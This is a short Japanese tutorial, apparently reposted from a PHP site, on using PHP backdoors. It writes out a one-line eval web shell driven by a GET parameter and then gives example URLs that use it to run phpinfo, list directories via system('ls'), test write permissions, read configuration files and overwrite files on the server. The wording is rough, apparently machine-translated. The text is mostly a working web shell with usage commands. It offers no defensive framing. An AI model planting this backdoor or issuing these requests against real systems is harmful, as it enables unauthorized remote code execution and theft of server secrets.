今日は、PHP バックドアの最も一般的な使用法のいくつかについて説明します。
まず、最も単純なバックドア (トロイの木馬とも呼ばれる) を作成します。
<?php eval($_GET['evl']);
これで、このサーバー上で多くの実行権限を取得できました。
そのシーンはどのような用途に使われますか?
プリント サーバーphpinfo
http://www.test.com/a.php?evl=phpinfo()
ディレクトリ内にどのようなファイルがあるかを確認します
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
ディレクトリが書き込み可能かどうかを確認します。次のステップです。書き込み可能なディレクトリに実行可能ファイルを作成できます
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
ファイルのコンテンツを取得します。通常は構成を読み取るために使用されます
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
書き込み可能なディレクトリにファイルを書き込みます
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
わかりました, 上記の部分は基本的にサーバーを表示するために使用できる部分を破壊したので、他の機能について推論してみましょう。
以上がPHP バックドアのいくつかの使用法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。